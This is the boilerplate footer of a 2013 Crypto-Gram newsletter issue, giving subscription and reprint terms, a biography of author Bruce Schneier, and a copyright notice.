Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise. You can subscribe, unsubscribe, or change your address on the Web at <http://www.schneier.com/crypto-gram.html>. Back issues are also available at that URL.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

CRYPTO-GRAM is written by Bruce Schneier. Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of 12 books—including “Liars and Outliers: Enabling the Trust that Society Needs to Thrive”—as well as hundreds of articles, essays, and academic papers. His influential newsletter “Crypto-Gram” and his blog “Schneier on Security” are read by over 250,000 people. He has testified before Congress, is a frequent guest on television and radio, has served on several government committees, and is regularly quoted in the press. Schneier is a fellow at the Berkman Center for Internet and Society at Harvard Law School, a program fellow at the New America Foundation’s Open Technology Institute, a board member of the Electronic Frontier Foundation, an Advisory Board Member of the Electronic Privacy Information Center, and the Security Futurologist for BT—formerly British Telecom. See <http://www.schneier.com>.

Crypto-Gram is a personal newsletter. Opinions expressed are not necessarily those of BT.

Copyright (c) 2013 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.